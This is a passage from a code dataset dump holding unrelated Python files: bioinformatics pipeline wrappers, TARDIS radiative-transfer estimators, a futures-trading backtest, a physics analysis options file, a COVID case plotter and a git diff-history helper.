functions in the different scripts\nimport os, shutil, subprocess\n\n#Function from script 3. Efetches using input\ndef downloadseq (query,web_env):\n\timport os, shutil, subprocess\n\t#Creates two strings, using the input for query and webenv, to make a \t\t system call to run the bash wget command\n\tfasta_call = \"wget -O proteinseq.fasta \\\"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=protein&query_key=\"+query+\"&WebEnv=\"+web_env+\"&rettype=fasta&retmode=text\\\"\"\n\tprint (fasta_call)\n\tgenbank_call = \"wget -O proteinseq_genbank.gb \\\"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=protein&query_key=\"+query+\"&WebEnv=\"+web_env+\"&rettype=gb&retmode=text\\\"\"\n\tos.system(fasta_call)\n\tos.system(genbank_call)\n\tprint (\"\\n\\nThe protein sequences were downloaded! Two versions of the files exist, one in fasta format, the other in genbank format. The files can be found under output_data/proteinseq.fasta and output_data/proteinseq_genbank.gb respectively\")\n\tshutil.copy(\"proteinseq.fasta\", \"output_data/proteinseq.fasta\")\n\tshutil.copy(\"proteinseq.fasta\", \"output_data/proteinseq_genbank.gb\")\n\treturn fasta_call,genbank_call\n\n#Functions from script 5:\n#Generates a blast db using input\ndef databasemaker (fastafile):\n\tprint (\"generating database for the protein sequences. Please wait...\")\n\n\t#This generates a string that allows a system call to run makeblastdb\n\tsystem_call = \"makeblastdb -in \"+fastafile+\" -input_type fasta -dbtype prot -parse_seqids -out sequencedb \"\n\tos.system (system_call)\n\t#os.system (\"makeblastdb -in proteinseq.fasta -input_type fasta -dbtype prot -parse_seqids -out sequencedb \")\n\treturn system_call\n\n#Aligns fasta files using input\ndef aligner (fastafile):\n\timport os, shutil, subprocess\n\tprint (\"Now aligning downloaded protein sequences. Please wait...\")\n\t#This aligns all the sequences in order of best alignment to worst alignment, based on an algorithm processed by clustalo \n\tsystem_call = \"clustalo -i \"+fastafile+\" -o seq_alignment_clustalo.msf --output-order tree-order --force -v\"\n\tos.system (system_call)\n\talignment=open(\"seq_alignment_clustalo.msf\").read()\n\tprint (\"The clustal omega alignment was completed. It can be found under output_data/seq_alignment_clustalo.msf\")\n\treturn system_call\n\n#Feeds a file into plotcon command and runs it with a os.system call. Returns to the user interface at the end\ndef plotconthis (alignment,subtitle):\n\timport os, shutil, subprocess\n\tprint (\"Now plotting the conservation of sequences across the protein alignment...\")\n\t#search_info=open(\"search.txt\").read()\n\tplot=\"plotcon -sequences \"+alignment+\" -winsize 12 -graph x11 -scorefile EBLOSUM62 -gsubtitle \\\"\"+subtitle+\"\\\" > conservation_plot.png\"\n\tprint (\"The plot can be found under output_data/conservation_plot.png\")\n\tos.system (str(plot))\n\tprint (\"The plot can be found under output_data/conservation_plot.png.\\n Press enter to continue...\")\n\tcontinuing = input(\"\")\n\tos.chdir(\"..\")\n\tos.system (\"pwd\")\n\tos.system (\"python3 0_interface.py\")\n\treturn plot\n\n#Creating an alignment file suitable for publication\n#Feeds a inputfile determined by the user into a command and runs it using a os system call\ndef showalignthis (inputfile,outfile):\n\timport os, shutil, subprocess\n\t#Creates a string using the input for inputfile and outfile, to make a system call to run a showalign emboss. \n\t#This generates a very pretty alignment file that can be used for a publication\n\tshowalign_call = \"showalign -sequence \"+inputfile+\" -outfile \"+outfile\n\tprint (showalign_call)\n\tos.system(showalign_call)\n\tprint (\"\\n\\nAn alignment suitable for publication was generated!\\n It can be found under outputdata/\"+outfile+\" .\")\n\t#copyover = \"output_data/\"+outfile\n\t#shutil.copy(outfile, copyover)\n\treturn showalign_call\n\n#Generating a consensus sequence:\n#Feeds a inputfile determined by the user into a command and runs it using a os system call\ndef consthis (inputfile,outfile):\n\timport os, shutil, subprocess\n\t#Creates two strings, using the input for inputfile and outfile, to make a system call to run a con emboss, generating a consensus sequence for a set of aligned sequences \n\tcons_call = \"cons -sequence \"+inputfile+\" -outseq \"+outfile\n\tprint (cons_call)\n\tos.system(cons_call)\n\tprint (\"\\n\\nA consensus sequence for your alignment file was generated!\\n It can be found under outputdata/\"+outfile+\" .\")\n\treturn cons_call\n\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"257839948","text":"from numba import njit\n\nfrom tardis.montecarlo.montecarlo_numba import (\n njit_dict_no_parallel,\n)\n\nfrom tardis.montecarlo.montecarlo_numba.frame_transformations import (\n calc_packet_energy,\n calc_packet_energy_full_relativity,\n)\n\nfrom tardis.montecarlo.montecarlo_numba.numba_config import (\n ENABLE_FULL_RELATIVITY,\n)\n\n\n@njit(**njit_dict_no_parallel)\ndef set_estimators(r_packet, distance, numba_estimator, comov_nu, comov_energy):\n \"\"\"\n Updating the estimators\n \"\"\"\n numba_estimator.j_estimator[r_packet.current_shell_id] += (\n comov_energy * distance\n )\n numba_estimator.nu_bar_estimator[r_packet.current_shell_id] += (\n comov_energy * distance * comov_nu\n )\n\n\n@njit(**njit_dict_no_parallel)\ndef set_estimators_full_relativity(\n r_packet, distance, numba_estimator, comov_nu, comov_energy, doppler_factor\n):\n numba_estimator.j_estimator[r_packet.current_shell_id] += (\n comov_energy * distance * doppler_factor\n )\n numba_estimator.nu_bar_estimator[r_packet.current_shell_id] += (\n comov_energy * distance * comov_nu * doppler_factor\n )\n\n\n@njit(**njit_dict_no_parallel)\ndef update_line_estimators(\n estimators, r_packet, cur_line_id, distance_trace, time_explosion\n):\n \"\"\"\n Function to update the line estimators\n\n Parameters\n ----------\n estimators : tardis.montecarlo.montecarlo_numba.numba_interface.Estimators\n r_packet : tardis.montecarlo.montecarlo_numba.r_packet.RPacket\n cur_line_id : int\n distance_trace : float\n time_explosion : float\n \"\"\"\n\n \"\"\" Actual calculation - simplified below\n r_interaction = math.sqrt(r_packet.r**2 + distance_trace**2 +\n 2 * r_packet.r * distance_trace * r_packet.mu)\n mu_interaction = (r_packet.mu * r_packet.r + distance_trace) / r_interaction\n doppler_factor = 1.0 - mu_interaction * r_interaction /\n ( time_explosion * C)\n \"\"\"\n\n if not ENABLE_FULL_RELATIVITY:\n energy = calc_packet_energy(r_packet, distance_trace, time_explosion)\n else:\n energy = calc_packet_energy_full_relativity(r_packet)\n\n estimators.j_blue_estimator[cur_line_id, r_packet.current_shell_id] += (\n energy / r_packet.nu\n )\n estimators.Edotlu_estimator[\n cur_line_id, r_packet.current_shell_id\n ] += energy\n","sub_path":"tardis/montecarlo/montecarlo_numba/estimators.py","file_name":"estimators.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270271385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 7 11:32:22 2017\n@author: lbrein\n --- 与tick 配套对比计算的 kline\n > 1m的 K线 模拟tick预测\n > 定期执行,用于筛选交易对\n\"\"\"\n\nfrom com.base.stat_fun import per, fisher\nfrom com.base.public import public, logger\nimport pandas as pd\nimport talib as ta\nimport numpy as np\nfrom com.object.obj_entity import train_future, train_total, future_baseInfo\nimport os\nfrom com.data.interface_Rice import interface_Rice, tick_csv_Rice\nimport itertools\nimport time\nimport uuid\nfrom multiprocessing import Pool, Manager\nimport statsmodels.api as sm # 协整\nimport copy\n\n\n# 回归方法\nclass train_future_singleExpect0(object):\n \"\"\"\n\n \"\"\"\n iniAmount = 250000 # 单边50万\n csvList = [\n \"SM_30_2.0_5_5_0.025_0.5_0.1_quick_single\",\n \"JM_15_2.0_60_1_0.25_1.0_0.1_quick_single\",\n \"JD_15_2.0_60_5_0.025_0.5_1.25_1_quick_single\",\n \"RB_15_2.0_30_5_0.2_0.5_1.25_1_quick_single\",\n \"AP_15_2.0_15_1_0.2_0.5_0.1_quick_single_13\"\n ]\n\n def __init__(self):\n # 费率和滑点\n self.saveDetail = True # 是否保存明细\n self.isSimTickUse = False # 是否使用1分钟模拟tick测试,否则直接使用kline回测\n self.topUse = False\n self.isEmptyUse = False # 是否清空记录\n #self.codeLists = ['JM', 'SM', 'V', 'I', 'AP', 'J','RB', 'SC', 'MA', 'JD','CU' , 'OI']\n self.codeLists = ['JM', 'SM', 'V', 'I', 'AP', 'J','RB', 'SC', 'MA', 'JD','CU' , 'OI']\n\n self.baseInfo = {}\n\n self.periodList = [15, 30] # 窗体参数\n self.scaleList = [2.0]\n self.shiftScale = 0.527 # 滑点模拟系数\n self.deltaLine = 0.8\n self.processCount = 6\n self.scaleDiffList = [0.2]\n self.scaleDiff2List = [1.0]\n self.scaleDiff2 = 0.5\n\n # k线时间\n # self.klineTypeList = ['5m']\n self.klineTypeList = ['15m', '30m']\n\n self.widthDeltaLineList = [0.025]\n self.widthDeltaLine = 0\n\n self.stopTimeLine = 5\n self.widthTimesPeriodList = [3]\n\n self.testDays = 90\n # 起始时间\n self.startDate = public.getDate(diff=-self.testDays) # 60天数据回测\n self.endDate = public.getDate(diff=0)\n\n self.total_tablename = 'train_total_1'\n self.detail_tablename = 'train_future_1'\n self.totalMethod = 'single'\n self.method = 'simTick' if self.isSimTickUse else 'quick'\n self.stage = 'single15'\n self.uidKey = \"%s_%s_%s_%s_%s_\" + self.method + \"_\" + self.stage\n self.isAll = 0\n\n def iterCond(self):\n # 多重组合参数输出\n keys = ['widthDeltaLine', 'scaleDiff2', 'scaleDiff']\n for s0 in self.__getattribute__(keys[0] + 'List'):\n self.__setattr__(keys[0], s0)\n\n for s1 in self.__getattribute__(keys[1] + 'List'):\n self.__setattr__(keys[1], s1)\n\n for s2 in self.__getattribute__(keys[2] + 'List'):\n self.__setattr__(keys[2], s2)\n\n yield '%s_%s_%s' % (str(s0), str(s1), str(s2))\n\n def tops(self, num=10):\n Total = train_total()\n Total.tablename = \"train_total\"\n return [m[0:1] for m in Total.last_top(num=num)]\n\n def switch(self):\n # 生成all\n\n if self.isAll == 1:\n self.isEmptyUse = True\n self.klineTypeList = ['15m', '30m']\n self.total_tablename = 'train_total_0'\n self.detail_tablename = 'train_future_0'\n self.empty()\n\n def empty(self):\n if self.isEmptyUse:\n Train = train_future()\n Total = train_total()\n Total.tablename = self.total_tablename\n Train.tablename = self.detail_tablename\n Train.empty()\n Total.empty()\n\n def Pool(self):\n time0 = time.time()\n\n pool = Pool(processes=self.processCount)\n shareDict = Manager().list([])\n\n Base = future_baseInfo()\n # 交易量大的,按价格排序, 类型:turple,第二位为夜盘收盘时间\n lists = Base.all(vol=100)\n tops = self.tops()\n # 清空数据库\n self.switch()\n\n for rs in lists:\n # 检查时间匹配\n codes = [rs[0]]\n if self.topUse and codes not in tops: continue\n print(rs)\n if codes[0] not in self.codeLists: continue\n\n for kt in self.klineTypeList:\n #self.start(codes, time0, kt, shareDict)\n try:\n pool.apply_async(self.start, (codes, time0, kt, shareDict))\n pass\n except Exception as e:\n print(e)\n continue\n pool.close()\n pool.join()\n\n cindex = 0\n\n def start(self, codes, time0, kt, shareDict):\n print(\"子进程启动:\", self.cindex, codes, time.time() - time0)\n\n self.klineType = kt\n # 主力合约\n self.codes = codes\n self.mCodes = mCodes = [n + '88' for n in codes]\n\n # 查询获得配置 - 费率和每手单量\n self.Base = future_baseInfo()\n for doc in self.Base.getInfo(codes):\n self.baseInfo[doc[\"code\"] + '88'] = doc\n\n cs = [self.baseInfo[m] for m in self.mCodes]\n\n # 计算tick 导致的滑点\n sh = [self.baseInfo[d + '88']['tick_size'] for d in codes]\n self.shift = [sh[i] * self.shiftScale for i in range(len(sh))]\n\n # 子进程共享类\n self.Rice = tick_csv_Rice()\n self.Rice.setTimeArea(cs[0][\"nightEnd\"])\n self.Train = train_future()\n self.Total = train_total()\n self.Total.tablename = self.total_tablename\n self.Train.tablename = self.detail_tablename\n\n # 查询获得N分钟K线\n dfs_l = self.Rice.kline(mCodes, period=self.klineType, start=self.startDate, end=self.endDate, pre=60)\n\n # 获得1分钟K线作为滚动线\n if self.isSimTickUse:\n dfs = self.Rice.kline(mCodes, period='1m', start=self.startDate, end=self.endDate, pre=0)\n else:\n dfs = dfs_l\n\n # 按时间截取并调整\n # dfs= self.dateAdjust(codes, dfs, sh)\n print('kline load:', mCodes, [len(dfs[m]) for m in mCodes])\n\n # 根据配置文件获取最佳交易手数对\n self.iniVolume = round(self.iniAmount / cs[0][\"lastPrice\"] / cs[0][\"contract_multiplier\"], 0)\n\n # 分参数执行\n results = []\n for period in self.periodList:\n for wdp in self.widthTimesPeriodList:\n self.widthTimesPeriod = int(wdp)\n docs = self.total(dfs, dfs_l, period=period)\n if docs is None or len(docs) == 0: continue\n logger.info((self.codes, period, self.klineType, len(docs), \" time:\", time.time() - time0))\n self.Total.insertAll(docs)\n\n # 混合K线-计算平均值和标准差\n def k_ma(self, d, p, close, period):\n # 截\n df = close[close.index < d][-period - 5:]\n df = df.append(pd.Series([p], index=[d]))\n # 平均值\n ma = ta.MA(df, timeperiod=period)\n std = ta.STDDEV(df, timeperiod=period, nbdev=1)\n # bullWidth\n width = (4 * std / ma * 100).fillna(0)\n\n # 近width变动\n wd1 = ta.MA(width - width.shift(1), timeperiod=self.widthTimesPeriod).fillna(0)\n wd2 = wd1 - wd1.shift(1)\n wd2m = wd2 * wd2 * wd2.shift(1)\n columns = ['ma', 'std', 'bullwidth', 'widthDelta', 'widthDelta2', 'wd2m']\n return pd.Series([x.values[-1] for x in [ma, std, width, wd1, wd2, wd2m]], index=columns)\n\n preNode, batchId = None, {}\n\n def total(self, dfs, dfs2=None, period=60):\n # 计算参数\n df0 = dfs[self.mCodes[0]]\n df0[\"rel_price\"] = close = df0[\"close\"]\n df0[\"datetime\"] = df0.index\n\n s0 = self.shift[0]\n p_l = df0[\"p_l\"] = (df0[\"close\"] + s0)\n p_h = df0[\"p_h\"] = (df0[\"close\"] - s0)\n\n if self.isSimTickUse:\n # 调用复合apply函数计算混合参数\n close2 = dfs2[self.mCodes[0]][\"close\"]\n df0_1 = df0.apply(lambda row: self.k_ma(row['datetime'], row['rel_price'], close2, period), axis=1)\n df0 = pd.concat([df0, df0_1], axis=1)\n\n else:\n df0[\"ma\"] = ma = ta.MA(close, timeperiod=period)\n df0[\"std\"] = std = ta.STDDEV(close, timeperiod=period, nbdev=1)\n # 上下柜\n # bullWidth\n df0[\"bullwidth\"] = width = (4 * std / ma * 100).fillna(0)\n # 近三分钟width变动\n df0[\"widthDelta\"] = wd1 = ta.MA(width - width.shift(1), timeperiod=self.widthTimesPeriod).fillna(0)\n df0[\"widthDelta2\"] = wd2 = wd1 - wd1.shift(1)\n df0[\"wd2m\"] = wd2 * wd2.shift(1)\n\n dif, dea, macd = ta.MACD(close, fastperiod=int(period / 3), slowperiod=period, signalperiod=9)\n df0[\"mastd\"] = ta.STDDEV(macd, timeperiod=period, nbdev=1)\n df0[\"macdm\"] = macd * macd.shift(1)\n df0[\"macd2d\"] = macd - macd.shift(1)\n df0[\"macd2dm\"] = (macd - macd.shift(1)) * (macd.shift(1) - macd.shift(2))\n\n # 相对波动\n df0['delta'] = (p_l - p_h) / df0['std']\n\n df1 = None\n # 循环 scale\n docs = []\n for scale in self.scaleList:\n for conds in self.iterCond():\n uid = self.uidKey % (\n '_'.join(self.codes), str(period), str(scale), self.klineType[:-1],\n str(self.widthTimesPeriod) + '_' + conds)\n\n self.stopTimeDiff = self.stopTimeLine * period * int(self.klineType[:-1])\n # 计算高低线值\n df0[\"top\"], df0[\"lower\"] = df0['ma'] + (scale - self.scaleDiff) * df0['std'], df0['ma'] - (\n scale + self.scaleDiff) * df0['std']\n\n if uid in self.csvList:\n file = self.Rice.basePath + '%s_%s_pre.csv' % ('_'.join(self.codes), self.klineType)\n print(uid, '---------------------------- to_cvs', file, df0.columns)\n df0.to_csv(file, index=0)\n\n # df0.fillna(0, inplace=True)\n # tot = None\n tot = self.detect(df0, df1, period=period, uid=uid)\n if tot is not None and tot['amount'] != 0:\n tot.update(\n {\n \"scale\": scale,\n \"method\": self.totalMethod,\n \"code\": self.codes[0],\n \"period\": period,\n \"uid\": uid,\n \"shift\": (p_l - p_h).mean(),\n \"createdate\": public.getDatetime()\n }\n )\n docs.append(tot)\n return docs\n\n def detect(self, df0, df1, period=15, uid=''):\n docs = self.stageApply(df0, df1, period=period, uid=uid)\n res = pd.DataFrame(docs)\n if len(res) > 0:\n if self.saveDetail:\n self.Train.insertAll(docs)\n\n diff = res[res['diff'] > 0]['diff'].mean()\n\n # 计算最大回测\n sum = res['income'].cumsum() + self.iniAmount\n inr = res['income'] / self.iniAmount\n # 计算夏普指数\n sha = (res['income'].sum() / self.iniAmount - 0.02 * self.testDays / 252) / inr.std()\n return {\n \"count\": int(len(docs) / 2),\n \"amount\": self.iniAmount,\n \"price\": res['rel_price'].mean(),\n \"income\": res[\"income\"].sum(),\n \"std\": res['rel_std'].mean(),\n \"delta\": res['delta'].mean(),\n \"maxdown\": ((sum.shift(1) - sum) / sum.shift(1)).max(),\n \"sharprate\": sha,\n \"timediff\": int(0 if np.isnan(diff) else diff)\n }\n else:\n return None\n\n def isEverOut(self, p1, p0, std, mode, b):\n for i in range(b, b - 5, -1):\n if (p1[i] - p0[i]) * mode > -self.scaleDiff2 * std[i] / 2: return True\n\n return False\n\n # 核心策略部分\n def stageApply(self, df0, df1, period=15, uid=''):\n isOpen, isRise, preDate, prePrice = 0, 0, None, 0\n doc, docs = {}, []\n\n ma, p_l, p_h, top, lower, std, delta, width, wd1, wd2, wd2m, macd2d, macd2dm = (df0[key] for key in\n \"ma,p_l,p_h,top,lower,std,delta,bullwidth,widthDelta,widthDelta2,wd2m,macd2d,macd2dm\".split(\n \",\"))\n\n sline, wline = self.stopTimeDiff, self.widthDeltaLine * width.mean() / 2.75\n\n for i in range(period, len(df0)):\n\n isRun, isstop = False, 0\n # 开仓2\n if delta[i] > self.deltaLine or np.isnan(ma[i]): continue\n\n cond1, cond2 = False, False\n if wline > 0:\n # 布林宽带变化率\n cond1 = (wd1[i] < wline) and (wd2[i] < (wline / 2))\n # 最大值\n cond2 = wd2m[i] < 0\n\n if isOpen == 0:\n # 突变状态开始\n # 大于上线轨迹\n if p_h[i] >= top[i] and cond1:\n isOpen = -1\n isRun = True\n\n elif p_l[i] <= lower[i] and cond1:\n isOpen = 1\n isRun = True\n\n elif self.isEverOut(p_h, top, std, 1, i) and not cond1 and (\n (macd2dm[i] < 0 and macd2d[i] > 0) or cond2):\n isOpen = -2\n isRun = True\n\n elif self.isEverOut(p_l, lower, std, -1, i) and not cond1 and (\n (macd2dm[i] < 0 and macd2d[i] < 0) or cond2):\n isOpen = 2\n isRun = True\n\n # 平仓\n else:\n # 回归ma则平仓 或 超过24分钟 或到收盘时间 强制平仓\n sign, dline = isOpen / abs(isOpen), - self.scaleDiff2 * std[i] / 2\n\n cond3 = (sign * ((p_h[i] if isOpen > 0 else p_l[i]) - ma[i]))\n #\n if cond3 >= -dline and not cond1 and (cond2 or (macd2dm[i] < 0 and sign * macd2d[i] < 0)):\n isOpen, isstop = 0, 2\n isRun = True\n\n elif cond3 >= 0 and cond1:\n isOpen = 0\n isRun = True\n\n # 超时止损\n elif sline > 0 and self.preNode is not None:\n tdiff = self.Rice.timeDiff(str(self.preNode[0]['createdate']), str(df0.index[i]), quick=sline)\n if tdiff > sline and cond3 >= -dline and cond2:\n isOpen, isstop = 0, 1\n isRun = True\n\n # 对冲类止损:\n else:\n pass\n\n if isRun:\n doc = self.order(df0.iloc[i], None, isOpen, uid, df0, isstop=isstop)\n if doc is not None:\n docs.append(doc)\n return docs\n\n batchId = None\n\n def calcIncome(self, n0, p0, df0):\n # 计算收益,最大/最小收益\n high = df0[(p0['createdate'] <= df0.index) & (df0.index <= n0['datetime'])]['high'].max()\n low = df0[(p0['createdate'] <= df0.index) & (df0.index <= n0['datetime'])]['low'].min()\n close = n0[\"close\"]\n sign = p0[\"mode\"] / abs(p0[\"mode\"])\n\n # 收入\n income = sign * (close - p0[\"price\"] - 2 * sign * self.shift[0]) * p0[\"vol\"] - p0[\"fee\"]\n # 最大收入\n highIncome = sign * ((high if sign > 0 else low) - p0[\"price\"] - 2 * sign * self.shift[0]) * p0[\"vol\"] - p0[\"fee\"]\n # 最大损失\n lowIncome = sign * ((high if sign < 0 else low) - p0[\"price\"] - 2 * sign * self.shift[0]) * p0[\"vol\"] - p0[\"fee\"]\n\n return income, highIncome, lowIncome, high, low\n\n\n def order(self, n0, n1, mode, uid, df0, isstop=0):\n # baseInfo 配置文件,查询ratio 和 每手吨数\n b0 = self.baseInfo[self.mCodes[0]]\n if mode != 0:\n self.batchId = uuid.uuid1()\n # 交易量\n v0 = self.iniVolume * b0[\"contract_multiplier\"]\n # 费率\n fee0 = (self.iniVolume * b0[\"ratio\"]) if b0[\"ratio\"] > 0.5 else ((b0[\"ratio\"]) * n0[\"close\"] * v0)\n\n doc = {\n \"createdate\": n0[\"datetime\"],\n \"code\": self.codes[0],\n \"price\": n0[\"close\"],\n \"vol\": self.preNode[0][\"vol\"] if self.preNode else v0,\n \"mode\": mode if not self.preNode else -self.preNode[0][\"mode\"],\n \"isopen\": 0 if mode == 0 else 1,\n \"fee\": fee0,\n \"income\": 0,\n \"isstop\": isstop,\n \"rel_price\": n0[\"rel_price\"],\n \"rel_std\": n0[\"std\"],\n \"bullwidth\": n0[\"bullwidth\"],\n \"widthDelta\": n0[\"widthDelta\"],\n \"price_diff\": n0[\"widthDelta2\"],\n \"shift\": n0[\"wd2m\"],\n \"delta\": n0[\"delta\"],\n \"batchid\": self.batchId,\n 'p_l': n0[\"p_l\"],\n 'p_h': n0[\"p_h\"],\n \"diff\": 0 if mode != 0 else self.Rice.timeDiff(str(self.preNode[0]['createdate']), str(n0[\"datetime\"])),\n \"uid\": uid\n }\n\n if mode == 0 and self.preNode:\n p0 = self.preNode[0]\n doc['income'], doc['highIncome'], doc['lowIncome'], doc['atr'], doc['macd'] = self.calcIncome(n0, p0, df0)\n doc[\"diff\"] = int(public.timeDiff(str(n0['datetime']), str(p0['createdate'])) / 60)\n\n self.preNode = None\n else:\n doc[\"income\"] = -doc[\"fee\"]\n self.preNode = [doc]\n return doc\n\n\ndef main():\n action = {\n \"kline\": 1,\n }\n\n if action[\"kline\"] == 1:\n obj = train_future_singleExpect0()\n obj.Pool()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"com/train/train_future_singleExpect_v10.py","file_name":"train_future_singleExpect_v10.py","file_ext":"py","file_size_in_byte":17975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352330508","text":"from Configurables import DaVinci\nfrom Configurables import Velo__VeloIPResolutionMonitorNT as IPMoni\n\ndv = DaVinci()\ndv.DataType = '2015'\ndv.DDDBtag = 'dddb-20150526'\ndv.CondDBtag = 'cond-20150625'\n#dv.EvtMax = 100\n\nipMoni = IPMoni('VeloIPResolutionMonitor')\nipMoni.CheckIDs = True\ndv.UserAlgorithms = [ipMoni]\ndv.TupleFile = 'IPTuple.root'\n","sub_path":"options/dvopts.py","file_name":"dvopts.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"626275942","text":"import os,sys,dotenv,logging,dateparser,random,argparse,pathlib2,csv,requests,math \nfrom datetime import datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom _datetime import timedelta\n\nif __name__ == '__main__':\n logging.basicConfig(filename='trythis.log',filemode='w',format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',level=logging.DEBUG)\n logging.info(\"Program Started\")\n response = requests.get('https://api.covid19data.cloud/')\n response.json()\n with open('csse_covid_19_data\\\\csse_covid_19_time_series\\\\time_series_covid19_confirmed_global.csv', newline='') as csvfile:\n reader = csv.reader(csvfile)\n dates = next(reader)\n totals = np.zeros(len(dates)-4) \n log_totals = np.zeros(len(dates)-4)\n base_date = dateparser.parse(dates[4])\n true_dates = [base_date + timedelta(days=x) for x in range(len(dates)-4)]\n for row in reader:\n if row[1] == 'US':\n for days in range(4,len(dates)):\n totals[days-4] = totals[days-4] + int(row[days])\n for days in range(4,len(dates)):\n log_totals[days-4] = math.log(totals[days-4])\n plt.figure()\n plt.suptitle('US Confirmed Cases vs Log of Confirmed Cases')\n plt.xlabel('time (days)')\n plt.ylabel('Cases')\n plt.subplot(211)\n plt.title('Confirmed Cases')\n plt.plot(true_dates,totals)\n plt.subplot(212)\n plt.title('Log of Confirmed Cases')\n plt.plot(true_dates,log_totals)\n plt.show()\n logging.info(\"Program Finished\")","sub_path":"trythis.py","file_name":"trythis.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481572251","text":"import os, shutil\nimport subprocess\n\nfrom git import Repo\n\nEMPTY_TREE_SHA = \"4b825dc642cb6eb9a060e54bf8d69288fbee4904\"\n\n\nclass GitWrapper:\n def __init__(self, directory):\n self.repo_path = directory\n\n def parse_files_tree(self, tree):\n try:\n for item in tree.traverse():\n if item.type == 'blob':\n print(item.name)\n else:\n self.parse_files_tree(item)\n except BaseException as e:\n print(e)\n\n def print_commit(self, commit):\n print('----')\n print(str(commit.hexsha))\n print(\"\\\"{}\\\" by {} ({})\".format(commit.summary,\n commit.author.name,\n commit.author.email))\n print(str(commit.authored_datetime))\n print(str(\"count: {} and size: {}\".format(commit.count(),\n commit.size)))\n\n print(\"Size of files changed: {}\".format(len(commit.diff())))\n for diff_added in commit.diff():\n print(diff_added.b_path)\n\n def print_repository(self, repo):\n print('Repo description: '.format(repo.description))\n print('Repo active branch is {}'.format(repo.active_branch))\n branches = repo.remotes.origin.refs\n print('Number of branches : {}'.format(len(branches)))\n for branch in branches:\n commits = list(repo.iter_commits(branch))\n print('Branch named {} - commits number: {}'.format(branch, len(commits)))\n\n print('Last commit for repo is {}.'.format(str(repo.head.commit.hexsha)))\n\n def get_changed_files_number(self, commit, parent):\n accepted_suffix = ['.cpp', '.h', '.cc', '.c++', '.java', '.cs']\n\n changed_files = [item.a_path for item in commit.diff(parent)]\n nr_of_files_changed = 0\n for file in changed_files:\n file_name, file_extension = os.path.splitext(file)\n if file_extension in accepted_suffix:\n nr_of_files_changed += 1\n\n return nr_of_files_changed\n\n def find_file(self, file):\n for path, subdirs, files in os.walk(self.repo_path):\n for name in files:\n if name == file:\n return True\n return False\n\n def get_file_from_git(self, commit, path):\n\n try:\n os.system(\"git --work-tree=\" + self.repo_path + \"\\~deleted checkout \"+commit.hexsha+\" \"+path)\n except BaseException as e:\n print(e)\n\n def get_deleted_files(self, commit, parent):\n accepted_suffix = ['.cpp', '.h', '.cc', '.c++', '.java']\n\n for diff_added in commit.diff(parent).iter_change_type('D'):\n other, file = os.path.split(diff_added.b_path)\n file_name, file_extension = os.path.splitext(file)\n if file_extension in accepted_suffix and not self.find_file(file):\n self.get_file_from_git(commit, diff_added.b_path)\n\n def get_repo(self):\n repo = Repo(self.repo_path)\n os.chdir(self.repo_path)\n return repo\n\n def get_old_paths_from_logs(self, files_list):\n paths_dict = {}\n for file in files_list:\n try:\n rel_path = file.replace(self.repo_path, 'a')\n rel_path = rel_path.replace(\"\\\\\", '/')\n rel_path = rel_path.replace(\"//\", '/')\n paths_dict[rel_path] = set()\n cmd = \"git log --format='%n' --name-only --follow \" + file\n old_paths = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()\n old_paths = old_paths.decode('UTF-8')\n old_paths = old_paths.replace('\\n', '')\n old_paths = set(old_paths.split('\\'\\''))\n for path in old_paths:\n if path != '':\n paths_dict[rel_path].add(\"a/\" + path.replace('\\'', ''))\n print(file)\n except BaseException as e:\n print(e)\n print(file)\n return paths_dict\n\n def get_old_paths(self, files_list):\n repo = self.get_repo()\n paths_dict = {}\n\n if not repo.bare and not os.path.exists(self.repo_path+'/old_paths_dict.txt'):\n print(\"Searching git old paths ...\")\n paths_dict = self.get_old_paths_from_logs(files_list)\n try:\n f = open(self.repo_path + '/old_paths_dict.txt', 'w+')\n for key in paths_dict.keys():\n line = key + \":\"\n for path in paths_dict[key]:\n line += path + \",\"\n f.write(line + \"\\n\")\n f.close()\n except BaseException as e:\n print(e)\n print(\"Error in git old paths saving of: \" + self.repo_path)\n else:\n if os.path.exists(self.repo_path+'\\\\old_paths_dict.txt'):\n print(\"Import from file git old paths ...\")\n f = open(self.repo_path + '\\\\old_paths_dict.txt', 'r')\n lines = f.readlines()\n for line in lines:\n key, values = line.split(\":\")\n values = values.replace(\"\\n\", \"\")\n values = values.split(\",\")\n paths_dict[key] = values[:-1] # \"\\n\" will generate an additional empty item in list\n else:\n print(\"Cannot load old paths dict for \"+self.repo_path)\n return paths_dict\n\n def get_commits(self):\n current_dir = os.getcwd()\n repo = self.get_repo()\n try:\n os.mkdir(self.repo_path+\"\\~diffs\")\n except:\n print(\"Could not create folder: \" + self.repo_path + \"\\~diffs\")\n try:\n if not repo.bare:\n print('Repo at '+self.repo_path+' successfully loaded.')\n # self.print_repository(repo)\n commits = list(repo.iter_commits(repo.active_branch))\n commits = list(reversed(commits))\n commits = commits[1:len(commits)]\n print('Number of commits : {}'.format(len(commits)))\n nr = 0\n print_nr = 0\n for commit in commits:\n try:\n parent = commit.parents[0] if commit.parents else EMPTY_TREE_SHA\n # self.getDeletedFiles(commit, parent)\n nr_of_files_changed = self.get_changed_files_number(commit, parent)\n if nr_of_files_changed >= 1:\n os.system(\"git diff \"+parent.hexsha+\" \"+commit.hexsha+\" > \"+self.repo_path+\"\\\\~diffs\\\\diff\"\n + str(nr) + \"_FilesChanged_\"+str(nr_of_files_changed) + \"_Date_\" +\n str(commit.authored_date)+\".txt\")\n nr += 1\n print_nr += 1\n print(print_nr)\n except BaseException as e:\n 